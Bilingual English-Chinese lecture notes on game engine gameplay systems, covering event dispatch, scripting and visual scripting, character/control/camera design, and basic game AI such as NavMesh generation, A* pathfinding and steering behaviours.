    Gameplay complexity and Building Blocks

    ​游戏复杂性和构建模块

    • Overview

      概述

    • Event Mechanism

      事件机制

    • Script System

      脚本系统

    • Visual Script

      可视化脚本

    • Character, Control and Camera

      角色、控制和相机

    AI

    Challenges in GamePlay (1/3)

    ​游戏玩法的挑战

    Cooperation among multiple systems

    ​多系统协作

    webp

    Challenges in GamePlay (2/3)

    Diversity of game play in the same game

    ​单种游戏多种玩法

    webp

    Challenges in GamePlay (3/3)

    Rapid iteration

    ​快速迭代

    webp

    这款游戏在研发过程中了改变了其玩法

    Epic acknowledged that within the Fortnite fundamentals, they could also do a battle royale mode, and rapidly developed their own version atop Fortnite in about two months.

    ​Epic 承认,在 Fortnite 的基本原理内,他们也可以做一款大逃杀模式,并在大约两个月内迅速在 Fortnite 的基础上开发了自己的版本。

    Event Mechanism

    ​事件机制

    Let Objects Talk

    ​让不同对象之间联系

    webp

    Event/Message Mechanism

    ​事件/消息机制

    • Abstract the world communication to messages

      将世界通信抽象为消息

    • Decoupling event sending and handling

      解耦事件发送和处理

    webp

    ​使用消息机制便于不同对象之间联系

    Publish-subscribe Pattern

    ​发布-订阅模式

    • Publisher categorizes published messages (events) into classes

      发布者将发布的消息(事件)分类为不同的类别

    • Subscriber receive messages (events) that are of interest without knowledge of which publishers

      订阅者接收感兴趣的消息(事件),但不知道是哪个发布者

    webp

    3 Key Components of Publish-subscribe Pattern

    ​发布-订阅模式的 3 个关键组件

    • Event Definition

      事件定义

    • Callback Registration

      回调注册

    • Event Despatching

      事件分派

    Event Definition

    ​事件定义

    webp

    ​定义事件的类型(枚举)和变量

    Type and Arguments

    ​类型和参数

    webp

    Impossible for hardcode

    ​硬编码不可能

    • Editable

      可编辑性

    webp

    Callback Registration

    ​回调注册

    Callback (function)

    ​回调(函数)

    • Any reference to executable code that is passed as an argument to another piece of code

      对作为参数传递给另一段代码的可执行代码的任何引用

    ​字面上的理解,回调函数就是一个参数,将这个函数作为参数传到另一个函数里面,当那个函数执行完之后,再执行传进去的这个函数。这个过程就叫做回调。

    webp

    Object Lifespan and Callback Safety

    ​对象生命周期和回调安全

    Time points of registration and execution differs

    注册执行的时间点不同

    webp

    webp

    ​执行回调函数时,回调函数所在的对象已经被销毁了,报错。

    Object Strong Reference

    ​对象强引用

    webp

    Make sure to unregister callback function before delete objects, otherwise it will cause memory leak!

    ​删除对象前请务必注销回调函数,否则会造成内存泄漏!

    Prevent object from de-allocation as long as callback function still registered

    ​只要回调函数仍然注册,就防止对象被取消分配

    Object Weak Reference

    ​对象弱引用

    webp

    Object could be de-allocated, and wilcheck callback function if valid

    ​对象可以被取消分配,并且将检查回调函数是否有效

    Event Dispatch

    ​事件分派

    • Send event to appropriate destination

      将事件发送到适当的目的地

    webp

    Event Dispatch: Immediate

    ​事件分派:立即

    webp

    parent function returns after callback function

    ​回调函数之后父函数返回,这么做可能出现如下问题:

    • Deep well of callbacks

      回调的深井

    webp

    ​这么做可能导致 Callstack 过长,占用内存。

    • Blocked by function

      被函数阻止

    ​期间某个函数耗时较长,导致帧率突然下降。

    webp

    The bleeding effect should be loaded but cost plenty of time in this function call

    ​应该加载出血效果,但在此函数调用中会花费大量时间

    • Difficult for parallelization

    ​难以并行化

    webp

    Event Queue

    ​事件队列

    Basic implementation

    ​基本实现

    • Store events in queue for handling at an arbitrary future time

      将事件存储在队列中,以便在未来的任意时间进行处理

    webp

    Event Serializing and Deserializing

    ​事件序列化和反序列化

    • To store various types of events

      存储各种类型的事件

    webp

    Event Quene

    ​事件队列

    Ring buffer

    ​环形缓冲区

    webp

    Batching

    ​批处理

    webp

    Problems of Event Queue (1/2)

    ​事件队列的问题

    • Timeline not determined by publisher

      事件发布者尚未确定时间表

    webp

    Problems of Event Queue (2/2)

    • One-frame delays

      一帧延迟

    webp

    Game Logic

    ​游戏逻辑

    Early Stage Game Logic Programming

    ​早期游戏逻辑编程

    Compiled language (mostly C/C++)

    ​编译语言(主要是 C/C++)

    • Compiled to machine code with high performance

      编译为高性能机器代码

    • More easier to use than assembly language

      比汇编语言更易于使用

    webp

    ​修改某个游戏逻辑需要重新编译整个游戏。

    Problem of Compiled Languages

    ​编译语言的问题

    Game requirements get complex as hardware evolves

    ​随着硬件的发展,游戏要求变得复杂

    • Need quick iterations of gameplay logic

      需要快速迭代游戏逻辑

    Issues with compiled language

    ​编译语言的问题

    • Need recompilation with even a little modification

      即使进行少量修改也需要重新编译

    • Program can easily get crashed with incorrect codes

      程序很容易因代码错误而崩溃

    Glue Designers and Programmers

    ​将设计师和程序员连接起来

    • Get rid of inefficient communication between designers and programmers

      摆脱设计师和程序员之间低效的沟通

    • Designers need direct control of gameplay logic

      设计师需要直接控制游戏逻辑

    • Artists need to quickly adjust assets at the runtime environment

      艺术家需要在运行时环境中快速调整资产

    webp

    Scripting Languages

    ​脚本语言

    • Support for rapid iteration

      支持快速迭代

    • Easy to learn and write

      易学易写

    • Support for hot update

      支持热更新

    • Stable, less crash by running in a sandbox

      沙盒运行稳定,崩溃少

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    function tick(delta)
    if input_system.isKeyDown(Keycode.W) then
    self:moveForward(delta)
    elseif input_system.isKeyDown(Keycode.S) then
    self:moveBackward(delta)
    end

    if input_system.iskeyDown(Keycode.MouseLeft) then
    self:fire(delta)
    end
    ...
    end
    Lua Script Example

    How Script Languages Work

    ​脚本语言的工作原理

    Script is converted to bytecode by a compiler first, then run on a virtual machine

    ​脚本首先由编译器转换为字节码,然后在虚拟机上运行

    webp

    Object Management between Scripts and Engine (1/2)

    ​脚本和引擎之间的对象管理 (1/2)

    Object lifetime management in native engine code

    原生引擎代码中的对象生命周期管理

    • Need to provide an object lifetime management mechanism

      需要提供对象生命周期管理机制

    • Not safe when script uses native objects (may have been destructed)

      当脚本使用原生对象时不安全(可能已被破坏)

    webp

    Object Management between Scripts and Engine (2/2)

    ​脚本和引擎之间的对象管理 (2/2)

    Object lifetime management in script

    脚本中的对象生命周期管理

    • The lifetime of objects are auto managed by script GC

      对象的生命周期由脚本 GC 自动管理

    • The time when object is deallocated is uncontrolled (controlled by GC)

      对象被释放的时间不受控制(由 GC 控制)

    • Easy to get memory leak if reference relations get complex in script

      如果脚本中的引用关系变得复杂,则容易发生内存泄漏

    webp

    Architectures for Scripting System (1/2)

    ​脚本系统架构 (1/2)

    Native language dominants the game world

    ​原生语言主导游戏世界

    • Most gameplay logic is in native code

      大多数游戏逻辑都采用原生代码

    • Script extends the functionality of native engine code

      脚本扩展了原生引擎代码的功能

    • High performance with compiled language

      编译语言带来高性能

    webp

    Architectures for Scripting System (2/2)

    Script language dominants the game world

    ​脚本语言主导游戏世界

    • Most gameplay logic is in script

      大多数游戏逻辑都在脚本中

    • Native engine code provides necessary functionality to script

      原生引擎代码为脚本提供必要的功能

    • Quick development iteration with script language

      使用脚本语言快速进行开发迭代

    webp

    Advanced Script Features - Hot Update

    ​高级脚本功能 - 热更新

    Allow modifications of script while game is running

    允许在游戏运行时修改脚本

    • Quick iteration for some specific logic

      针对某些特定逻辑进行快速迭代

    • Enable to fix bugs in script while game is online

      允许在游戏在线时修复脚本中的错误

    A troublesome problem with hot update

    ​热更新的一个麻烦问题

    • All variables reference to old functions shouldbe updated too

      所有引用旧函数的变量也应更新

    webp

    Issues with Script Language

    ​脚本语言的问题

    The performance is usually lower than compiled language

    ​性能通常低于编译型语言

    • Weakly typed language is usually harder to optimize when compile

      弱类型语言在编译时通常更难优化

    • Need a virtual machine to run the bytecode

      需要虚拟机来运行字节码

    • JIT is a solution for optimization

      JIT 是优化的解决方案

    ​Weakly typed language is usually harder to refactor

    ​弱类型语言通常更难重构

    webp

    Make a Right Choice of Scripting Language

    ​正确选择脚本语言

    Things need to be considered

    ​需要考虑的事项

    • Language performance

      语言性能

    • Built-in features, e.g. object-oriented programming support

      内置功能,例如面向对象编程支持

    Select the proper architecture of scripting

    ​选择合适的脚本架构

    • Object lifetime management in native engine code or script

      本机引擎代码或脚本中的对象生命周期管理

    • Which one is dominant, native language or script

      本机语言或脚本哪个占主导地位

    ​热门脚本语言 (1/2)

    Lua (used in World of Warcraft, Civilization V)

    ​Lua(用于《魔兽世界》、《文明 5》)

    • Robust and mature

      强大且成熟

    • Excellent runtime performance

      出色的运行时性能

    • Light-weighted and highly extensible

      轻量且高度可扩展

    Python (used in The Sims 4, EVE Online)

    ​Python(用于《模拟人生 4》、《星战前夜》)

    • Reflection support

      反射支持

    • Built-in object-oriented support

      内置面向对象支持

    • Extensive standard libraries and third-party modules

      广泛的标准库和第三方模块

    C# (to bytecode offline, used in Unity)

    ​C#(离线字节码,用于 Unity)

    • Low learning curve, easy to read and understand

      学习难度低,易于阅读和理解

    • Built-in object-oriented support

      内置面向对象支持

    • Great community with lots of active developers

      拥有大量活跃开发人员的优秀社区

    webp

    Visual Scripting

    ​可视化脚本

    Why We Need Visual Scripting

    ​为什么我们需要可视化脚本

    • Friendly to non-programmers, especially designers and artists

      对非程序员,尤其是设计师和艺术家来说很友好

    • Less error-prone with drag-drop operations instead of code writing

      使用拖放操作代替代码编写,更不容易出错

    webp

    Visual Script is a Program Language

    ​Visual Script 是一种程序语言

    Visual script is also a programming language, which usually needs

    ​Visual Script 也是一种编程语言,通常需要

    • Variable

      变量

    • Statement and Expression

      语句和表达式

    • Control Flow

      控制流

    • Function

      函数

    • Class (for object-oriented programming language)

      类(用于面向对象编程语言)

    webp

    Variable

    ​变量

    Preserve the data to be processed or output

    ​保存要处理或输出的数据

    • Type

      类型

      • Basic type, e.g. integer, floating

        基本类型,例如整数、浮点数

      • Complex type, e.g.structure

        复杂类型,例如结构体

    • Scope

      作用域

      • Local variable

        局部变量

      • Member variable

        成员变量

    webp

    Variable Visualization - Data Pin and Wire

    ​变量可视化 - 数据引脚和数据线

    Use data wires through data pins to pass variables (parameters)

    ​通过数据引脚使用数据线传递变量(参数)

    • Each data type uses a unique pin color

      每种数据类型都使用独特的引脚颜色

    webp

    Statement and Expression

    ​语句和表达式

    Control how to process data

    ​控制如何处理数据

    • Statement: expresses some action to be carried out

      语句:表达要执行的某些操作

      • Assignment Statement

        赋值语句

      • Function Statement

        函数语句

    • Expression: to be evaluated to determine its value

      表达式:要进行求值以确定其值

      • Function Expression

        函数表达式

      • Math Expression

        数学表达式

    webp

    Statement and Expression Visualization - Node

    ​语句和表达式可视化 - 节点

    Use nodes to represent statements and expressions

    ​使用节点表示语句表达式

    • Statement Node

      语句节点

    • Expression Node

      表达式节点

    webp

    Control Flow

    ​控制流

    Control the statement execution order

    ​控制语句的执行顺序

    • Sequence

      顺序

      • By default statements are executed one by one

        默认情况下,语句会逐个执行

    • Conditional

      条件

      • Next statement is decided by a condition

        下一个语句由条件决定

    • Loop

      循环

      • Statements are executed iteratively until thecondition is not true

        语句会迭代执行,直到条件不成立

    webp

    Control Flow Visualization -Execution Pin and Wire

    ​控制流可视化 - 执行引脚和连线

    Use execution wires through execution pins to make statements sequence

    ​使用执行连线通过执行引脚来制作语句序列

    • Use control statement nodes to make different control flow

      使用控制语句节点来制作不同的控制流

    webp

    Function

    ​函数

    A logic module which take in data, process it and return result(s)

    ​接收数据、处理数据并返回结果的逻辑模块

    • Input Parameter

      输入参数

      • The data required input to be processed

        需要输入以进行处理的数据

    • Function Body

      函数主体

      • Control how to process data

        控制如何处理数据

    • Return value(s)

      返回值

      • The data to be returned

        要返回的数据

    webp

    Function Visualization -Function Graph

    ​函数可视化 - 函数图

    Use a graph with connected nodes to make a function

    ​使用带有连接节点的来制作函数

    webp

    Class

    ​类

    A prototype for a kind of objects

    ​一种对象的原型

    • Member Variable

      成员变量

      • The lifetime is managed by the object instance

        生命周期由对象实例管理

    • Member Function

      成员函数

      • Can access member variables directly

        可以直接访问成员变量

      • Maybe overrided by derived classes

        可能被派生类覆盖

    webp

    Class Visualization -Blueprint

    ​类可视化 - 蓝图

    Use blueprint to define a class that inherits from a native class

    ​使用蓝图定义从本机类继承的类

    • Event Callback Functions

      事件回调函数

    • Member Functions

      成员函数

    • Member Variables

      成员变量

    webp

    Make Graph User Friendly

    ​使图表更方便用户使用

    • Fuzzy finding

      模糊查找

    • Accurate suggestions by type

      按类型提供准确建议

    Visual Script Debugger

    ​可视化脚本调试器

    Debug is an important step among development

    ​调试是开发过程中的重要步骤

    Provide user-friendly debug tools for visual scripting

    ​为可视化脚本提供用户友好的调试工具

    webp

    Issues with Visual Scriping (1/2)

    ​可视化脚本问题 (1/2)

    Visual script is hard to merge for a team work

    ​可视化脚本很难在团队合作中合并

    • Usually a visual script is stored as a binary file

      通常,可视化脚本以二进制文件形式存储

    • Manually reorder script graph is inefficient and error-prone even with a merge tool

      即使使用合并工具,手动重新排序脚本图也效率低下且容易出错

    webp

    Issues with Visual Scripting (2/2)

    The graph can get pretty messy with complex logic

    ​图表可能因逻辑复杂而变得相当混乱

    • Need uniform graph layout rules for a team work

      团队合作需要统一的图表布局规则

    webp

    Script and Graph are Twins

    ​脚本和图是双胞胎

    webp

    “3C” in Game Play

    What is 3C?

    3C: Character, Control & Camera

    ​3C:角色、控制和摄像头

    3C is the primary element that determines the gameplay experience

    ​3C 是决定游戏体验的主要元素

    webp

    Character

    ​角色

    In-game character, both player and npc.

    ​游戏中的角色,包括玩家和 NPC。

    Include character movement, combat, healthmana, what skills and talents they have, etc.

    ​包括角色移动、战斗、生命值、他们拥有的技能和天赋等。

    One most basic element of a character is movement.

    ​角色最基本的元素之一是移动

    webp

    Character: Well-designed Movement

    ​角色:精心设计的动作

    Movement looks simple, but it’s hard to do well.

    ​动作看似简单,但做好却很难。

    In AAA games, every basic state of action needs to bebroken down into detailed states.

    ​在 AAA 游戏中,每个基本动作状态都需要分解为详细状态。

    webp

    Extended Character: More complex and varied states

    ​扩展角色:更加复杂多样的状态

    webp

    • Hanging

      悬挂

    • Skating

      滑冰

    • Diving

      跳水

    Extended Character: Cooperate with other systems

    ​扩展角色:与其他系统配合

    Game effects, sound, environment interaction.

    ​游戏特效、声音、环境互动。

    Extended Character: More realistic motion with Physics

    ​扩展角色:更逼真的物理运动

    • Airflow

      气流

    • Inertia tensor

      惯性张量

    • Torque

      扭矩

    webp

    Movement State Machine

    ​运动状态机

    webp

    Control

    ​控制

    Different input device

    ​不同的输入设备

    Different game play

    ​不同的游戏玩法

    webp

    A Good Example of Control

    From Input to Game Logic

    webp

    Control: Zoom in and out

    ​控制:放大和缩小

    Control: Aim Assist

    ​控制:瞄准辅助

    webp

    ​让玩家体验更好。如果没有瞄准辅助,有可能因延迟(接受信号输入到逻辑中射弹这段时间)导致玩家无法瞄准。

    Control: Feedback

    ​控制:反馈

    webp

    ​一些地方让手柄震动。

    Control: Context Awareness

    ​控制:情境感知

    Context-sensitive controls

    ​情境敏感控制

    • The same input button produces different effects in different game scenarios

      同一输入按钮在不同的游戏场景中产生不同的效果

    webp

    Control: Chord & Key Sequences

    ​控制:和弦和按键序列

    webp

    Chords

    ​和弦

    • when pressed at the same time, produce a unique behavior in the game

      同时按下时,在游戏中产生独特的行为

    Key Sequences

    ​按键序列

    • Gesture detection is generally implemented by keeping a brief history of the HlD actions performed by the player

      手势检测通常通过保存玩家执行的 HlD 操作的简要历史记录来实现

    Camera: Subjective Feelings

    ​相机:主观感受

    webp

    Camera Basic: POV & FOV

    ​摄像机基础:POV 和 FOV

    POV (point of view)

    ​POV(视点)

    • determines the position of the player to observe

      确定玩家观察的位置

    FOV (field of view)

    ​FOV(视野)

    • determines the size of the player’s viewing Angle

      确定玩家视角的大小

    webp

    Camera Binding

    ​摄像机绑定

    Using POV and rotation to bind.

    ​使用 POV 和旋转进行绑定。

    webp

    Camera Control

    ​相机控制

    webp

    ​相机与角色的相对位置不应是完全固定。

    Camera Track

    ​相机轨迹

    webp

    Camera Effects

    ​相机特效

    Provide the camera with more post-visual effects, such as filters and shake.

    ​为相机提供更多后期视觉效果,如滤镜和抖动。

    webp

    Many Cameras: Camera Manager

    ​多个摄像机:相机管理

    Camera: Subjective Feelings

    ​相机:主观感受

    Complex effects are often achieved by multiple base adjustments. To create a sense of speed as an example, we can do:

    ​复杂的效果往往需要通过多次基础调整来实现。以营造速度感为例,我们可以这样做:

    • Add lines in the speed direction

      在速度方向上添加线条

    • The character falls backwards

      角色向后倒下

    • The dynamic fuzzy

      动态模糊

    • Zoom in FOV (to speed up changes in screen content)

      放大 FOV(以加快屏幕内容的变化)

    loose feeling

    ​放松的感觉

    • Relax camera movement

      放松镜头运动

    webp

    Cinematic

    ​电影

    • filter, motion, sound, narrator, model, animation, camera movement, …

      滤镜、动作、声音、旁白、模型、动画、镜头运动……

    webp

    Camera

    ​相机

    For artists and designers to optimize the effect:

    ​供艺术家和设计师优化效果:

    • Inheritable classes

      可继承的类

    • Function that can be accessed by Blueprint

      蓝图可访问的函数

    • Adjustable parameters

      可调整的参数

    webp

    Everything is Gameplay.

    References

    Event Mechanism

    Script

    Visual Scripting

    Gameplay and 3C

    第十六节:游戏引擎 Gameplay 玩法系统:基础 AI

    Basic Artificial Intelligence

    ​基础人工智能

    Outline of Artificial intelligence Systems

    ​人工智能系统概述

    Al Basic

    ​人工智能基础

    • Navigation

      导航

    • Steering

      转向

    • Crowd Simulation

      人群模拟

    • Sensing

      感知

    • Classic Decision Making Algorithms

      经典决策算法

    Advanced Al

    ​高级人工智能

    • Planning and Goals

      规划和目标

    • Machine Learning

      机器学习

    ​导航

    ​游戏中的导航

    Find paths from a location to another in an automatic manner

    ​自动查找从一个位置到另一个位置的路径

    webp

    ​导航三步骤

    webp

    • Map representation

      地图表示

    • Path finding

      路径查找

    • Path smoothing

      路径平滑

    Map Representations - Walkable Area

    ​地图表示 - 可行走区域

    • We need to tell Al agents where they can walk - Walkable area

      我们需要告诉人工智能代理他们可以走到哪里 - 可行走区域

    • Walkable area of players is determined by character motion capabilities

      玩家的可行走区域由角色运动能力决定

      • Physical Collision

        物理碰撞

      • Climbing slope/height

        爬坡/高度

      • Jumping distance

        跳跃距离

    • Simulating movement of Al agents as players costs too much

      模拟人工智能代理作为玩家的移动成本太高

    • Al agents are still expected to have the same walkable area as players

      人工智能代理仍然需要与玩家拥有相同的可行走区域

    Map Representations - Formats

    ​地图表示 - 格式

    • Waypoint Network

      航点网络

    • Grid

      网格

    • Navigation Mesh

      导航网格

    • Sparse Voxel Octree

      稀疏体素八叉树

    Waypoint Network

    ​航点网络

    • Network connecting critical points (waypoints) from the map

      连接地图上关键点(航点)的网络

    • Waypoint sources:

      航点来源:

      • Designed important locations(下图中红点

        设计重要位置

      • Corner points to cover walkable area(下图中绿点

        角点覆盖可步行区域

      • Internal points to connect near-by waypointsadding flexibility to navigation(下图中蓝点

        内部点连接附近的航点,为导航增添灵活性

    webp

    ​魔兽争霸就使用了航点网络。

    Usage of waypoint network is similar to subway system

    ​航点网络的使用方式与地铁系统类似

    • Find the nearest points to get on and off the network

      查找最近的上下车点

    • Plan the path on the waypoint network

      规划航点网络上的路径

    webp

    Pros:

    ​优点:

    • Easy to implement

      易于实施

    • Fast path finding, even for large maps

      路径查找速度快,即使对于大型地图也是如此

    Cons:

    ​缺点:

    • Limited flexibility: must go to the nearest point inthe network before navigation

      灵活性有限:导航前必须前往网络中的最近点

    • Waypoint selection requires manual intervention

      航点选择需要人工干预

    webp

    Grid

    ​网格

    • Intuitive discretization of map

      直观的地图离散化

    • Uniform subdivision into small regular grid shapes

      均匀细分为小的规则网格形状

    • Common grid shapes

      常见的网格形状

      • Square

        正方形

      • Triangle

        三角形

      • Hexagon

        六边形

    webp

    ​像文明五这样的六边形网格不易在内存中分配存储空间。

    Grid property could be modified in runtime to reflect dynamic environmental changes

    ​可以在运行时修改网格属性以反映动态环境变化

    webp

    Pros:

    ​优点:

    • Easy to implement

      易于实现

    • Uniform data structure

      统一的数据结构

    • Dynamic

      动态

    Cons:

    ​缺点:

    • Accuracy depends on grid resolution

      精度取决于网格分辨率

    • Dense grid lowers pathfinding performance

      密集的网格会降低寻路性能

    • High memory consumption

      内存消耗高

    • Hard to handle 3D map

      难以处理 3D 地图

    webp

    ​导航网络难以处理 3D 地图。

    ​导航网格 (NavMesh)

    • Solves the problem of representing overlapped walkable areas

      解决表示重叠可行走区域的问题

    • Approximates the walkable area of character controller based on physical collision and motion capabilities

      根据物理碰撞和运动能力估计角色控制器的可行走区域

    • Lowers network density to boost pathfinding performance

      降低网络密度以提高寻路性能

    webp

    ​NavMesh 示例

    Neighboring 3D convex polygons to represent walkable areas

    ​相邻的 3D 凸多边形表示可行走区域

    webp

    Convex Polygon of NavMesh

    ​NavMesh 的凸多边形

    Why convex polygon?

    ​为什么是凸多边形?

    • Pathfinding generates a series of polygon (Polygon Corridor) need to walk through

      寻路会生成一系列需要穿过的多边形(多边形走廊

    • Convexity guarantees the final path is limited inthe polygon and two adjacent polygons have onlyone common edge (Portal)

      凸性保证最终路径仅限于多边形内,并且两个相邻多边形只有一个共同边(传送门

    webp

    ​NavMesh 的优缺点

    Pros:

    ​优点:

    • Support 3D walkable surface

      支持 3D 可行走表面

    • Accurate

      准确

    • Fast in pathfinding

      寻路速度快

    • Flexible for selection of start/destination

      可灵活选择起点/终点

    • Dynamic

      动态

    Cons:

    ​缺点:

    • Complex generation algorithm

      生成算法复杂

    • Not support 3D space

      不支持 3D 空间

    webp

    Sparse Voxel Octree

    ​稀疏体素八叉树

    • Represents “flyable” 3D space

      表示“可飞行”的 3D 空间

    • Similar to spatial partitioning

      类似于空间分区

    • Finest level voxels represents complicated boundary

      最精细级别的体素表示复杂边界

    • Coarser-level voxels represents uniform regions

      较粗糙级别的体素表示均匀区域

    webp

    Path Finding

    ​路径查找

    Distances in map representations can be abstracted as edge costs in graph

    ​地图表示中的距离可以抽象为图中的边成本

    webp

    webp

    ​深度优先搜索

    Expand most recently added

    ​展开最近添加的

    ​广度优先搜索

    Expand least recently added

    ​展开最近最少添加的

    Dijkstra Algorithm

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    for each vertex v:
    dist[v] = ∞
    prev[v]= none
    dist[source]= 0
    set all vertices to unexplored
    while destination not explored:
    v = least-valued unexplored vertex
    set v to explored
    for each edge(v, w):
    if dist[v] + len(v,w) < dist[w]:
    dist[w]= dist[v]+ len(v, w)
    prev[W]=V

    ​总是能搜索到图中两点间最短距离。

    A Star (A*)

    • Expand lowest cost in list

      扩展列表中成本最低的元素

    • Distance is known distance from source + heuristic

      距离是距源的已知距离 + 启发式

    • Greedy: stops when reaches the goal

      贪婪:达到目标时停止

    A* - Cost calculation

    Cost calculation: $f(n) = g(n) + h(n)$

    ​成本计算:$f(n) = g(n) + h(n)$

    • $g(n)$: the exact cost of the path from the start to node $n$

      $g(n)$:从起点到节点 $n$ 的路径的准确成本

    • $h(n)$: the estimated cost from node $n$ to the goal

      $g(n)$:从起点到节点 $n$ 的路径的准确成本

    webp

    A* - Heuristic On Grids

    ​A* - 网格启发式算法

    • For 4 directions of movement, we can use Manhattan distance

      对于 4 个移动方向,我们可以使用曼哈顿距离(来计算 $g(n)$ 和 $h(n)$)

    • $D_1$: cost for moving to the adjacent node

      $D_1$:移动到相邻节点的成本

    • $h(n)=D_1\cdot(d_x+d_y)$

      • $d_x=|x_n-x_{goal}|, d_y=|y_n-y_{goal}|$

    webp

    A*- Heuristic On NavMesh

    ​A*- NavMesh 上的启发式方法

    Multiple choices when evaluating cost on NavMesh

    ​评估 NavMesh 上的成本时有多种选择

    • Using polygon centers or vertices usually over-estimate the cost

      使用多边形中心或顶点通常会高估成本

    • Using hybrid method introduces too many points to check

      使用混合方法会引入太多要检查的点

    • Midpoints of edges - a good balance

    (选用区域的)边缘的中点 - 良好的平衡

    webp

    • On a navigation mesh that allows any angle ofmovement, use a straight line distance

      在允许任意角度移动的导航网格上,使用直线距离

    • Use midpoint of the edge entering the currentnode as node cost calculation point

      使用进入当前节点的边缘中点作为节点成本计算点

    • $D$: the cost for moving unit distance in any direction

      $D$:向任意方向移动单位距离的成本

      • $h(n)=D\cdot\sqrt{d_x\cdot d_x+d_y\cdot d_y}$
      • $d_x=|x_n-x_{goal}|, d_y=|y_n-y_{goal}|$

    webp

    A*-NavMesh Walkthrough

    ​A*-NavMesh 演练

    webp

    A*- Heuristic

    ​A*- 启发式

    • $h(n)$ controls $A^*$'s behavior.

      $h(n)$ 控制 $A^*$ 的行为。

    • With 100% accurate estimates, get shortest paths quickly

      以 100% 准确的估计,快速获得最短路径

    • Too low, continue to get shortest paths, but slow down

      太低,继续获得最短路径,但速度会减慢

    • Too high, exit early without shortest pathBalance between pathfinding speed and accuracy

      太高,提前退出,没有最短路径在寻路速度和准确性之间取得平衡

    Path Smoothing

    ​路径平滑

    • Why we need path smoothing

      为什么我们需要路径平滑

      • Zigzag, many unnecessary turns

        之字形,许多不必要的转弯

    • “String Pulling”- Funnel Algorithm

      “拉线”- 漏斗算法

    webp

    Path Smoothing-Funnel Algorithm

    ​路径平滑漏斗算法

    • The scope of the funnel is the possible scope of the path

      漏斗的范围是路径的可能范围

    • Narrow the funnel if necessary to fit the portal

      必要时缩小漏斗以适应门户

    webp

    Terminate when the goal is in the funnel

    ​当目标处于漏斗中时终止

    webp

    ​NavMesh 生成-体素化

    Sample collision scene by voxelization

    ​通过体素化示例碰撞场景

    webp

    ​NavMesh 生成-区域分割

    • Calculate the distance of each voxel to border

      计算每个体素到边界的距离

    • Mark border voxels by AgentRadius to avoid clipping

      通过 AgentRadius 标记边界体素以避免剪切

    webp

    Watershed Algorithm

    ​分水岭算法

    • Gradually “flood” the “terrain”

      逐渐“淹没”“地形”

    • Form “watershed” (dividing ridge) when “pools” meet

      当“水池”相遇时形成“分水岭”(分水岭)

    webp

    Segment the “neighboring" voxels into regions to provide a good basis for polygon mesh

    ​将“相邻”体素分割成区域,为多边形网格提供良好的基础

    webp

    Regions don’t have overlapping voxels in 2D

    ​区域在 2D 中没有重叠体素

    webp

    ​NavMesh 生成-网格生成

    Generate NavMesh from segmented regions

    ​从分段区域生成 NavMesh

    webp

    ​现在有插件来实现这个。

    ​NavMesh 高级功能-多边形标记

    Useful for marking terrain types: plains, mountain, water, etc.

    ​用于标记地形类型:平原、山脉、水域等。

    • “Paint colors" to add user-defined regions

      “绘制颜色”以添加用户定义的区域

    • Polygons generated from user-defined regions have special flag

      从用户定义的区域生成的多边形具有特殊标记

    webp

    ​NavMesh 高级功能-Tile

    • Fast for responding to dynamic objects

      快速响应动态对象

    • Avoid rebuilding the entire NavMesh

      避免重建整个 NavMesh

    • TileSize - trade-off between pathfinding and dynamic rebuilding performance

      TileSize- 寻路和动态重建性能之间的权衡

    webp

    ​在游戏中,导航网络可能会发生变化。

    ​NavMesh 高级功能-网格外链接

    Allow agents to jump or teleport

    ​允许代理跳跃或传送

    webp

    Steering

    ​转向

    From Path to Motion

    ​从路径到运动

    • Cars cannot follow planned path exactly

      汽车无法完全遵循计划的路径(车辆具有转向半径)

    • Motion of cars are limited by theirs motion abilities:

      汽车的运动受到其运动能力的限制:

      • Linear acceleration (throttle/brake)

        线性加速度(油门/刹车)

      • Angular acceleration (steering force)

        角加速度(转向力)

    • Motion needs to be adjusted according to the limits

      运动需要根据限制进行调整

    webp

    Steering Behaviors

    ​转向行为

    webp

    • Seek / Flee

      寻找 / 逃跑

    • Velocity Match

      速度匹配(从起点出发加速,减速到终点停止)

    • Align

      对齐(让车头朝着某个方向)

    Seek/Flee

    ​寻找/逃跑

    Steer the agent towards / away from the target

    ​引导代理朝向/远离目标

    • Position matching in the nature

      自然中的位置匹配

    • Accelerate with max acceleration towards / away from the target

      以最大加速度朝向/远离目标加速

    • Will oscillate around the target

      会围绕目标振荡

    • Input:

      输入:

      • Self position

        自身位置

      • Target position

        目标位置

    • Output:

      输出:

      • Acceleration

        加速度

    webp

    Seek / Flee Variations

    ​寻找 / 逃离变体

    Modifying the target in runtime can generate new steering behaviors

    ​在运行时修改目标可以生成新的转向行为

    webp

    • Pursue

      追寻

    • Path Following

      路径跟随

    • Wander

      漫游

    • Flow Field Following

      流场跟随

    Velocity Match

    ​速度匹配

    Matches the target velocity

    ​匹配目标速度

    • Calculate acceleration from matching time and velocity differences

      根据匹配时间和速度差异计算加速度

    • Clamp the acceleration by maximum acceleration of agents

      通过代理的最大加速度限制加速度

    • Input:

      输入:

      • Target velocity

        目标速度

      • Self velocity

        自身速度

      • Matching time

        匹配时间

    • Output:

      输出:

      • Acceleration

        加速度

    Align

    ​对齐

    Matches target orientation

    ​匹配目标方向

    • Input:

      输入:

      • Target orientation

        目标方向

      • Self orientation

        自我定位

    • Output:

      输出:

      • Angular acceleration

        角加速度

    webp

    Crowd Simulation

    ​人群模拟

    Crowd

    ​人群

    A large group of individuals share information in the same environment alone or in a group

    ​一大群人单独或成群地在同一环境中分享信息

    • Collision avoidance

      避免碰撞

    • Swarming

      蜂拥

    • Motion in formation

      形成队列运动

    webp

    Crowd Simulation Models

    ​人群模拟模型

    • Started from “Boids” system of Reynolds

      从雷诺的 “Boids” 系统开始

    • Three families of models:

      三个模型系列:

      • Microscopic models

        微观模型

        • “Bottom-Up”

          “自下而上”

        • Focus on individuals

          关注个体

      • Macroscopic models

        宏观模型

        • Crowd as a unified and continuous entity

          人群作为一个统一且连续的实体

      • Mesoscopic models

        中观模型

        • Divide the crowd into groups

          将人群分成几组

    Microscopic Models-Rule-based Models

    ​微观模型-基于规则的模型

    Flock dynamics of animal crowds as an emergent behavior by modeling motion of each individuals with simple predefined rules:

    ​通过使用简单的预定义规则对每个个体的运动进行建模,将动物群体的群体动态视为一种突发行为:

    • Separation: to steer away from all of its neighbors

      分离:远离所有邻居

    • Cohesion: to steer towards the “center of mass”

      凝聚:转向“重心”

    • Alignment: to line up with agents close by

      对齐:与附近的代理对齐

    webp

